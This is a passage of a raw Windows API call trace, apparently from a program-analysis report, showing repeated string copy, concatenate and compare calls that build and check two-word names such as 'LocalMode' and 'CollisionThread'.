(lpString1="ControlTime", lpString2="DocumentLink") returned -1 [0311.086] lstrlenA (lpString="DocumentLink") returned 12 [0311.086] lstrcpyA (in: lpString1=0x2e69f90, lpString2="Local" | out: lpString1="Local") returned="Local" [0311.086] lstrcatA (in: lpString1="Local", lpString2="Mode" | out: lpString1="LocalMode") returned="LocalMode" [0311.086] lstrcmpA (lpString1="OperatorCore", lpString2="LocalMode") returned 1 [0311.086] lstrcmpA (lpString1="UtilStart", lpString2="LocalMode") returned 1 [0311.086] lstrcmpA (lpString1="StopLine", lpString2="LocalMode") returned 1 [0311.086] lstrcmpA (lpString1="ChipMark", lpString2="LocalMode") returned -1 [0311.086] lstrcmpA (lpString1="UtilPack", lpString2="LocalMode") returned 1 [0311.086] lstrcmpA (lpString1="SheetValue", lpString2="LocalMode") returned 1 [0311.086] lstrcmpA (lpString1="SettingsWhite", lpString2="LocalMode") returned 1 [0311.086] lstrcmpA (lpString1="ControlTime", lpString2="LocalMode") returned -1 [0311.086] lstrcmpA (lpString1="DocumentLink", lpString2="LocalMode") returned -1 [0311.086] lstrlenA (lpString="LocalMode") returned 9 [0311.086] lstrcpyA (in: lpString1=0x2e69f9a, lpString2="Window" | out: lpString1="Window") returned="Window" [0311.086] lstrcatA (in: lpString1="Window", lpString2="Mask" | out: lpString1="WindowMask") returned="WindowMask" [0311.086] lstrcmpA (lpString1="OperatorCore", lpString2="WindowMask") returned -1 [0311.086] lstrcmpA (lpString1="UtilStart", lpString2="WindowMask") returned -1 [0311.086] lstrcmpA (lpString1="StopLine", lpString2="WindowMask") returned -1 [0311.086] lstrcmpA (lpString1="ChipMark", lpString2="WindowMask") returned -1 [0311.087] lstrcmpA (lpString1="UtilPack", lpString2="WindowMask") returned -1 [0311.087] lstrcmpA (lpString1="SheetValue", lpString2="WindowMask") returned -1 [0311.087] lstrcmpA (lpString1="SettingsWhite", lpString2="WindowMask") returned -1 [0311.087] lstrcmpA (lpString1="ControlTime", lpString2="WindowMask") returned -1 [0311.087] lstrcmpA (lpString1="DocumentLink", lpString2="WindowMask") returned -1 [0311.087] lstrcmpA (lpString1="LocalMode", lpString2="WindowMask") returned -1 [0311.087] lstrlenA (lpString="WindowMask") returned 10 [0311.087] lstrcpyA (in: lpString1=0x2e69fa5, lpString2="Active" | out: lpString1="Active") returned="Active" [0311.087] lstrcatA (in: lpString1="Active", lpString2="Urls" | out: lpString1="ActiveUrls") returned="ActiveUrls" [0311.087] lstrcmpA (lpString1="OperatorCore", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="UtilStart", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="StopLine", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="ChipMark", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="UtilPack", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="SheetValue", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="SettingsWhite", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="ControlTime", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="DocumentLink", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="LocalMode", lpString2="ActiveUrls") returned 1 [0311.087] lstrcmpA (lpString1="WindowMask", lpString2="ActiveUrls") returned 1 [0311.088] lstrlenA (lpString="ActiveUrls") returned 10 [0311.088] lstrcpyA (in: lpString1=0x2e69fb0, lpString2="Collision" | out: lpString1="Collision") returned="Collision" [0311.088] lstrcatA (in: lpString1="Collision", lpString2="Thread" | out: lpString1="CollisionThread") returned="CollisionThread" [0311.088] lstrcmpA (lpString1="OperatorCore", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="UtilStart", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="StopLine", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="ChipMark", lpString2="CollisionThread") returned -1 [0311.088] lstrcmpA (lpString1="UtilPack", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="SheetValue", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="SettingsWhite", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="ControlTime", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="DocumentLink", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="LocalMode", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="WindowMask", lpString2="CollisionThread") returned 1 [0311.088] lstrcmpA (lpString1="ActiveUrls", lpString2="CollisionThread") returned -1 [0311.088] lstrlenA (lpString="CollisionThread") returned 15 [0311.088] lstrcpyA (in: lpString1=0x2e69fc0, lpString2="Operator" | out: lpString1="Operator") returned="Operator" [0311.088] lstrcatA (in: lpString1="Operator", lpString2="Page" | out: lpString1="OperatorPage") returned="OperatorPage" [0311.088] lstrcmpA (lpString1="OperatorCore", lpString2="OperatorPage") returned -1 [0311.088] lstrcmpA (lpString1="UtilStart", lpString2="OperatorPage") returned 1 [0311.088] lstrcmpA (lpString1="StopLine", lpString2="OperatorPage") returned 1 [0311.088] lstrcmpA (lpString1="ChipMark", lpString2="OperatorPage") returned -1 [0311.088] lstrcmpA (lpString1="UtilPack", lpString2="OperatorPage") returned 1 [0311.088] lstrcmpA (lpString1="SheetValue", lpString2="OperatorPage") returned 1 [0311.088] lstrcmpA (lpString1="SettingsWhite", lpString2="OperatorPage") returned 1 [0311.088] lstrcmpA (lpString1="ControlTime", lpString2="OperatorPage") returned -1 [0311.088] lstrcmpA (lpString1="DocumentLink", lpString2="OperatorPage") returned -1 [0311.088] lstrcmpA (lpString1="LocalMode", lpString2="OperatorPage") returned -1 [0311.089] lstrcmpA (lpString1="WindowMask", lpString2="OperatorPage") returned 1 [0311.089] lstrcmpA (lpString1="ActiveUrls", lpString2="OperatorPage") returned -1 [0311.089] lstrcmpA (lpString1="CollisionThread", lpString2="OperatorPage") returned -1 [0311.089] lstrlenA (lpString="OperatorPage") returned 12 [0311.089] lstrcpyA (in: lpString1=0x2e69fcd, lpString2="Core" | out: lpString1="Core") returned="Core" [0311.089] lstrcatA (in: lpString1="Core", lpString2="Process" | out: lpString1="CoreProcess") returned="CoreProcess" [0311.089] lstrcmpA (lpString1="OperatorCore", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="UtilStart", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="StopLine", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="ChipMark", lpString2="CoreProcess") returned -1 [0311.089] lstrcmpA (lpString1="UtilPack", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="SheetValue", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="SettingsWhite", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="ControlTime", lpString2="CoreProcess") returned -1 [0311.089] lstrcmpA (lpString1="DocumentLink", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="LocalMode", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="WindowMask", lpString2="CoreProcess") returned 1 [0311.089] lstrcmpA (lpString1="ActiveUrls", lpString2="CoreProcess") returned -1 [0311.089] lstrcmpA (lpString1="CollisionThread", lpString2="CoreProcess") returned -1 [0311.089] lstrcmpA (lpString1="OperatorPage", lpString2="CoreProcess") returned 1 [0311.089] lstrlenA (lpString="CoreProcess") returned 11 [0311.089] lstrcpyA (in: lpString1=0x2e69fd9, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0311.089] lstrcatA (in: lpString1="Desktop", lpString2="File" | out: lpString1="DesktopFile") returned="DesktopFile" [0311.089] lstrcmpA (lpString1="OperatorCore", lpString2="DesktopFile") returned 1 [0311.089] lstrcmpA (lpString1="UtilStart", lpString2="DesktopFile") returned 1 [0311.089] lstrcmpA (lpString1="StopLine", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="ChipMark", lpString2="DesktopFile") returned -1 [0311.090] lstrcmpA (lpString1="UtilPack", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="SheetValue", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="SettingsWhite", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="ControlTime", lpString2="DesktopFile") returned -1 [0311.090] lstrcmpA (lpString1="DocumentLink", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="LocalMode", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="WindowMask", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="ActiveUrls", lpString2="DesktopFile") returned -1 [0311.090] lstrcmpA (lpString1="CollisionThread", lpString2="DesktopFile") returned -1 [0311.090] lstrcmpA (lpString1="OperatorPage", lpString2="DesktopFile") returned 1 [0311.090] lstrcmpA (lpString1="CoreProcess", lpString2="DesktopFile") returned -1 [0311.090] lstrlenA (lpString="DesktopFile") returned 11 [0311.090] lstrcpyA (in: lpString1=0x2e69fe5, lpString2="Byte" | out: lpString1="Byte") returned="Byte" [0311.091] lstrcatA (in: lpString1="Byte", lpString2="Check" | out: lpString1="ByteCheck") returned="ByteCheck" [0311.091] lstrcmpA (lpString1="OperatorCore", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="UtilStart", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="StopLine", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="ChipMark", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="UtilPack", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="SheetValue", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="SettingsWhite", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="ControlTime", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="DocumentLink", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="LocalMode", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="WindowMask", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="ActiveUrls", lpString2="ByteCheck") returned -1 [0311.091] lstrcmpA (lpString1="CollisionThread", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="OperatorPage", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="CoreProcess", lpString2="ByteCheck") returned 1 [0311.091] lstrcmpA (lpString1="DesktopFile", lpString2="ByteCheck") returned 1 [0311.091] lstrlenA (lpString="ByteCheck") returned 9 [0311.091] lstrcpyA (in: lpString1=0x2e69fef, lpString2="Device" | out: lpString1="Device") returned="Device" [0311.091] lstrcatA (in: lpString1="Device", lpString2="Computer" | out: lpString1="DeviceComputer") returned="DeviceComputer" [0311.091] lstrcmpA (lpString1="OperatorCore", lpString2="DeviceComputer") returned 1 [0311.091] lstrcmpA (lpString1="UtilStart", lpString2="DeviceComputer") returned 1 [0311.091] lstrcmpA (lpString1="StopLine", lpString2="DeviceComputer") returned 1 [0311.091] lstrcmpA (lpString1="ChipMark", lpString2="DeviceComputer") returned -1 [0311.091] lstrcmpA (lpString1="UtilPack", lpString2="DeviceComputer") returned 1 [0311.091] lstrcmpA (lpString1="SheetValue", lpString2="DeviceComputer") returned 1 [0311.092] lstrcmpA (lpString1="SettingsWhite", lpString2="DeviceComputer") returned 1 [0311.092] lstrcmpA (lpString1="ControlTime", lpString2="DeviceComputer") returned -1 [0311.092] lstrcmpA (lpString1="DocumentLink", lpString2="DeviceComputer") returned 1 [0311.092] lstrcmpA (lpString1="LocalMode", lpString2="DeviceComputer") returned 1 [0311.092] lstrcmpA (lpString1="WindowMask", lpString2="DeviceComputer") returned 1 [0311.092] lstrcmpA (lpString1="ActiveUrls", lpString2="DeviceComputer") returned -1 [0311.092] lstrcmpA (lpString1="CollisionThread", lpString2="DeviceComputer") returned -1 [0311.092] lstrcmpA (lpString1="OperatorPage", lpString2="DeviceComputer") returned 1 [0311.092] lstrcmpA (lpString1="CoreProcess", lpString2="DeviceComputer") returned -1 [0311.092] lstrcmpA (lpString1="DesktopFile", lpString2="DeviceComputer") returned -1 [0311.092] lstrcmpA (lpString1="ByteCheck", lpString2="DeviceComputer") returned -1 [0311.092] lstrlenA (lpString="DeviceComputer") returned 14 [0311.092] lstrcpyA (in: lpString1=0x2e69ffe, lpString2="Make" | out: lpString1="Make") returned="Make" [0311.092] lstrcatA (in: lpString1="Make", lpString2="Stop" | out: lpString1="MakeStop") returned="MakeStop" [0311.092] lstrcmpA (lpString1="OperatorCore", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="UtilStart", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="StopLine", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="ChipMark", lpString2="MakeStop") returned -1 [0311.092] lstrcmpA (lpString1="UtilPack", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="SheetValue", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="SettingsWhite", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="ControlTime", lpString2="MakeStop") returned -1 [0311.092] lstrcmpA (lpString1="DocumentLink", lpString2="MakeStop") returned -1 [0311.092] lstrcmpA (lpString1="LocalMode", lpString2="MakeStop") returned -1 [0311.092] lstrcmpA (lpString1="WindowMask", lpString2="MakeStop") returned 1 [0311.092] lstrcmpA (lpString1="ActiveUrls", lpString2="MakeStop") returned -1 [0311.093] lstrcmpA (lpString1="CollisionThread", lpString2="MakeStop") returned -1 [0311.093] lstrcmpA (lpString1="OperatorPage", lpString2="MakeStop") returned 1 [0311.093] lstrcmpA (lpString1="CoreProcess", lpString2="MakeStop") returned -1 [0311.093] lstrcmpA (lpString1="DesktopFile", lpString2="MakeStop") returned -1 [0311.093] lstrcmpA (lpString1="ByteCheck", lpString2="MakeStop") returned -1 [0311.093] lstrcmpA (lpString1="DeviceComputer", lpString2="MakeStop") returned -1 [0311.093] lstrlenA (lpString="MakeStop") returned 8 [0311.093] lstrcpyA (in: lpString1=0x2e6a007, lpString2="Service" | out: lpString1="Service") returned="Service" [0311.093] lstrcatA (in: lpString1="Service", lpString2="Operator" | out: lpString1="ServiceOperator") returned="ServiceOperator" [0311.093] lstrcmpA (lpString1="OperatorCore", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="UtilStart", lpString2="ServiceOperator") returned 1 [0311.093] lstrcmpA (lpString1="StopLine", lpString2="ServiceOperator") returned 1 [0311.093] lstrcmpA (lpString1="ChipMark", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="UtilPack", lpString2="ServiceOperator") returned 1 [0311.093] lstrcmpA (lpString1="SheetValue", lpString2="ServiceOperator") returned 1 [0311.093] lstrcmpA (lpString1="SettingsWhite", lpString2="ServiceOperator") returned 1 [0311.093] lstrcmpA (lpString1="ControlTime", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="DocumentLink", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="LocalMode", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="WindowMask", lpString2="ServiceOperator") returned 1 [0311.093] lstrcmpA (lpString1="ActiveUrls", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="CollisionThread", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="OperatorPage", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="CoreProcess", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="DesktopFile", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="ByteCheck", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="DeviceComputer", lpString2="ServiceOperator") returned -1 [0311.093] lstrcmpA (lpString1="MakeStop", lpString2="ServiceOperator") returned -1 [0311.093] lstrlenA (lpString="ServiceOperator") returned 15 [0311.094] lstrcpyA (in: lpString1=0x2e6a017, lpString2="Mouse" | out: lpString1="Mouse") returned="Mouse" [0311.094] lstrcatA (in: lpString1="Mouse", lpString2="Active" | out: lpString1="MouseActive") returned="MouseActive" [0311.094] lstrcmpA (lpString1="OperatorCore", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="UtilStart", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="StopLine", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="ChipMark", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="UtilPack", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="SheetValue", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="SettingsWhite", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="ControlTime", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="DocumentLink", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="LocalMode", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="WindowMask", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="ActiveUrls", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="CollisionThread", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="OperatorPage", lpString2="MouseActive") returned 1 [0311.094] lstrcmpA (lpString1="CoreProcess", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="DesktopFile", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="ByteCheck", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="DeviceComputer", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="MakeStop", lpString2="MouseActive") returned -1 [0311.094] lstrcmpA (lpString1="ServiceOperator", lpString2="MouseActive") returned 1 [0311.094] lstrlenA (lpString="MouseActive") returned 11 [0311.094] lstrcpyA (in: lpString1=0x2e6a023, lpString2="Check" | out: lpString1="Check") returned="Check" [0311.094] lstrcatA (in: lpString1="Check", lpString2="Manager" | out: lpString1="CheckManager") returned="CheckManager" [0311.094] lstrcmpA (lpString1="OperatorCore", lpString2="CheckManager") returned 1 [0311.094] lstrcmpA (lpString1="UtilStart", lpString2="CheckManager") returned 1 [0311.094] lstrcmpA (lpString1="StopLine", lpString2="CheckManager") returned 1 [0311.094] lstrcmpA (lpString1="ChipMark", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="UtilPack", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="SheetValue", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="SettingsWhite", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="ControlTime", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="DocumentLink", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="LocalMode", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="WindowMask", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="ActiveUrls", lpString2="CheckManager") returned -1 [0311.095] lstrcmpA (lpString1="CollisionThread", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="OperatorPage", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="CoreProcess", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="DesktopFile", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="ByteCheck", lpString2="CheckManager") returned -1 [0311.095] lstrcmpA (lpString1="DeviceComputer", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="MakeStop", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="ServiceOperator", lpString2="CheckManager") returned 1 [0311.095] lstrcmpA (lpString1="MouseActive", lpString2="CheckManager") returned 1 [0311.095] lstrlenA (lpString="CheckManager") returned 12 [0311.095] lstrcpyA (in: lpString1=0x2e6a030, lpString2="Chip" | out: lpString1="Chip") returned="Chip" [0311.095] lstrcatA (in: lpString1="Chip", lpString2="Operation" | out: lpString1="ChipOperation") returned="ChipOperation" [0311.095] lstrcmpA (lpString1="OperatorCore", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="UtilStart", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="StopLine", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="ChipMark", lpString2="ChipOperation") returned -1 [0311.095] lstrcmpA (lpString1="UtilPack", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="SheetValue", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="SettingsWhite", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="ControlTime", lpString2="ChipOperation") returned 1 [0311.095] lstrcmpA (lpString1="DocumentLink", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="LocalMode", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="WindowMask", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="ActiveUrls", lpString2="ChipOperation") returned -1 [0311.096] lstrcmpA (lpString1="CollisionThread", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="OperatorPage", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="CoreProcess", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="DesktopFile", lpString2="ChipOperation") returned 1 [0311.096] lstrcmpA (lpString1="ByteCheck", lpString2="ChipOperation") returned -1 [0311.096] lstrcmpA (lpString1="DeviceComputer", lpString2="ChipOperation") returned 1 [0311.096] lstrlenA (lpString="ChipOperation") returned 13 [0311.096] lstrcpyA (in: lpString1=0x2e6a03e, lpString2="Game" | out: lpString1="Game") returned="Game" [0311.096] lstrcatA (in: lpString1="Game", lpString2="Desktop" | out: lpString1="GameDesktop") returned="GameDesktop" [0311.096] lstrlenA (lpString="GameDesktop") returned 11 [0311.096] lstrcpyA (in: lpString1=0x2e6a04a, lpString2="Urls" | out: lpString1="Urls") returned="Urls" [0311.096] lstrcatA (in: lpString1="Urls", lpString2="List" | out: lpString1="UrlsList") returned="UrlsList" [0311.096] lstrlenA (lpString="UrlsList") returned 8 [0311.096] lstrcpyA (in: lpString1=0x2e6a053, lpString2="Pack" | out: lpString1="Pack") returned="Pack" [0311.096] lstrcatA (in: lpString1="Pack", lpString2="Mouse" | out: lpString1="PackMouse") returned="PackMouse" [0311.096] lstrlenA (lpString="PackMouse") returned 9 [0311.096] lstrcpyA (in: lpString1=0x2e6a05d, lpString2="Computer" | out: lpString1="Computer") returned="Computer" [0311.096] lstrcatA (in: lpString1="Computer", lpString2="Reply" | out: lpString1="ComputerReply") returned="ComputerReply" [0311.096] lstrlenA (lpString="ComputerReply") returned 13 [0311.097] lstrcpyA (in: lpString1=0x2e6a06b, lpString2="Stop" | out: lpString1="Stop") returned="Stop" [0311.097] lstrcatA (in: lpString1="Stop", lpString2="Process" | out: lpString1="StopProcess") returned="StopProcess" [0311.097] lstrlenA (lpString="StopProcess") returned 11 [0311.097] lstrcpyA (in: lpString1=0x2e6a077, lpString2="Mouse" | out: lpString1="Mouse") returned="Mouse" [0311.097] lstrcatA (in: lpString1="Mouse", lpString2="Tool" | out: lpString1="MouseTool") returned="MouseTool" [0311.097] lstrlenA (lpString="MouseTool") returned 9 [0311.097] lstrcpyA (in: lpString1=0x2e6a081, lpString2="Collect" | out: lpString1="Collect") returned="Collect" [0311.097] lstrcatA (in: lpString1="Collect", lpString2="Device" | out: lpString1="CollectDevice") returned="CollectDevice" [0311.097] lstrlenA (lpString="CollectDevice") returned 13 [0311.097] lstrcpyA (in: lpString1=0x2e6a08f, lpString2="Tool" | out: lpString1="Tool") returned="Tool" [0311.097] lstrcatA (in: lpString1="Tool", lpString2="Pack" | out: lpString1="ToolPack") returned="ToolPack" [0311.097] lstrlenA (lpString="ToolPack") returned 8 [0311.097] lstrcpyA (in: lpString1=0x2e6a098, lpString2="Collision" | out: lpString1="Collision") returned="Collision" [0311.097] lstrcatA (in: lpString1="Collision", lpString2="Page" | out: lpString1="CollisionPage") returned="CollisionPage" [0311.097] lstrlenA (lpString="CollisionPage") returned 13 [0311.097] lstrcpyA (in: lpString1=0x2e6a0a6, lpString2="Stop" | out: lpString1="Stop") returned="Stop" [0311.097] lstrcatA (in: lpString1="Stop", lpString2="Folder" | out: lpString1="StopFolder") returned="StopFolder" [0311.097] lstrlenA (lpString="StopFolder") returned 10 [0311.097] lstrcpyA (in: lpString1=0x2e6a0b1, lpString2="Stop" | out: lpString1="Stop") returned="Stop" [0311.097] lstrcatA (in: lpString1="Stop", lpString2="Book" | out: lpString1="StopBook") returned="StopBook" [0311.098] lstrlenA (lpString="StopBook") returned 8 [0311.098] lstrcpyA (in: lpString1=0x2e6a0ba, lpString2="Window" | out: lpString1="Window") returned="Window" [0311.098] lstrcatA (in: lpString1="Window", lpString2="Util" | out: lpString1="WindowUtil") returned="WindowUtil" [0311.098] lstrlenA (lpString="WindowUtil") returned 10 [0311.098] lstrcpyA (in: lpString1=0x2e6a0c5, lpString2="Link" | out: lpString1="Link") returned="Link" [0311.098] lstrcatA (in: lpString1="Link", lpString2="Driver" | out: lpString1="LinkDriver") returned="LinkDriver" [0311.098] lstrlenA (lpString="LinkDriver") returned 10 [0311.098] lstrcpyA (in: lpString1=0x2e6a0d0, lpString2="Options" | out: lpString1="Options") returned="Options" [0311.098] lstrcatA (in: lpString1="Options", lpString2="Stop" | out: lpString1="OptionsStop") returned="OptionsStop" [0311.098] lstrlenA (lpString="OptionsStop") returned 11 [0311.098] lstrcpyA (in: lpString1=0x2e6a0dc, lpString2="System" | out: lpString1="System") returned="System" [0311.098] lstrcatA (in: lpString1="System", lpString2="Mark" | out: lpString1="SystemMark") returned="SystemMark" [0311.098] lstrlenA (lpString="SystemMark") returned 10 [0311.098] lstrcpyA (in: lpString1=0x2e6a0e7, lpString2="Line" | out: lpString1="Line") returned="Line" [0311.098] lstrcatA (in: lpString1="Line", lpString2="Sheet" | out: lpString1="LineSheet") returned="LineSheet" [0311.098] lstrlenA (lpString="LineSheet") returned 9 [0311.098] lstrcpyA (in: lpString1=0x2e6a0f1, lpString2="Return" | out: lpString1="Return") returned="Return" [0311.098] lstrcatA (in: lpString1="Return", lpString2="Device" | out: lpString1="ReturnDevice") returned="ReturnDevice" [0311.098] lstrlenA (lpString="ReturnDevice") returned 12 [0311.098] lstrcpyA (in: lpString1=0x2e6a0fe, lpString2="Check" | out: lpString1="Check") returned="Check" [0311.098] lstrcatA (in: lpString1="Check", lpString2="Text" | out: lpString1="CheckText") returned="CheckText" [0311.098] lstrlenA (lpString="CheckText") returned 9 [0311.099] lstrcpyA (in: lpString1=0x2e6a108, lpString2="Process" | out: lpString1="Process") returned="Process" [0311.099] lstrcatA (in: lpString1="Process", lpString2="Mask" | out: lpString1="ProcessMask") returned="ProcessMask" [0311.099] lstrlenA (lpString="ProcessMask") returned 11 [0311.099] lstrcpyA (in: lpString1=0x2e6a114, lpString2="Document" | out: lpString1="Document") returned="Document" [0311.099] lstrcatA (in: lpString1="Document", lpString2="Process" | out: lpString1="DocumentProcess") returned="DocumentProcess" [0311.099] lstrlenA (lpString="DocumentProcess") returned 15 [0311.099] lstrcpyA (in: lpString1=0x2e6a124, lpString2="Computer" | out: lpString1="Computer") returned="Computer" [0311.099] lstrcatA (in: lpString1="Computer", lpString2="Tool" | out: lpString1="ComputerTool") returned="ComputerTool" [0311.099] lstrlenA (lpString="ComputerTool") returned 12 [0311.099] lstrcpyA (in: lpString1=0x2e6a131, lpString2="Chip" | out: lpString1="Chip") returned="Chip" [0311.099] lstrcatA (in: lpString1="Chip", lpString2="Time" | out: lpString1="ChipTime") returned="ChipTime" [0311.099] lstrlenA (lpString="ChipTime") returned 8 [0311.099] lstrcpyA (in: lpString1=0x2e6a13a, lpString2="Device" | out: lpString1="Device") returned="Device" [0311.099] lstrcatA (in: lpString1="Device", lpString2="Text" | out: lpString1="DeviceText") returned="DeviceText" [0311.099] lstrlenA (lpString="DeviceText") returned 10 [0311.099] lstrcpyA (in: lpString1=0x2e6a145, lpString2="Line" | out: lpString1="Line") returned="Line" [0311.099] lstrcatA (in: lpString1="Line", lpString2="Page" | out: lpString1="LinePage") returned="LinePage" [0311.099] lstrlenA (lpString="LinePage") returned 8 [0311.099] lstrcpyA (in: lpString1=0x2e6a14e, lpString2="Mode" | out: lpString1="Mode") returned="Mode" [0311.099] lstrcatA (in: lpString1="Mode", lpString2="Active" | out: lpString1="ModeActive") returned="ModeActive" [0311.099] lstrlenA (lpString="ModeActive") returned 10 [0311.099] lstrcpyA (in: lpString1=0x2e6a159, lpString2="Level" | out: lpString1="Level") returned="Level" [0311.099] lstrcatA (in: lpString1="Level", lpString2="Core" | out: lpString1="LevelCore") returned="LevelCore" [0311.100] lstrlenA (lpString="LevelCore") returned 9 [0311.100] lstrcpyA (in: lpString1=0x2e6a163, lpString2="Chip" | out: lpString1="Chip") returned="Chip" [0311.100] lstrcatA (in: lpString1="Chip", lpString2="Char" | out: lpString1="ChipChar") returned="ChipChar" [0311.100] lstrlenA (lpString="ChipChar") returned 8 [0311.100] lstrcpyA (in: lpString1=0x2e6a16c, lpString2="Junk" | out: lpString1="Junk") returned="Junk" [0311.100] lstrcatA (in: lpString1="Junk", lpString2="Junk" | out: lpString1="JunkJunk") returned="JunkJunk" [0311.100] 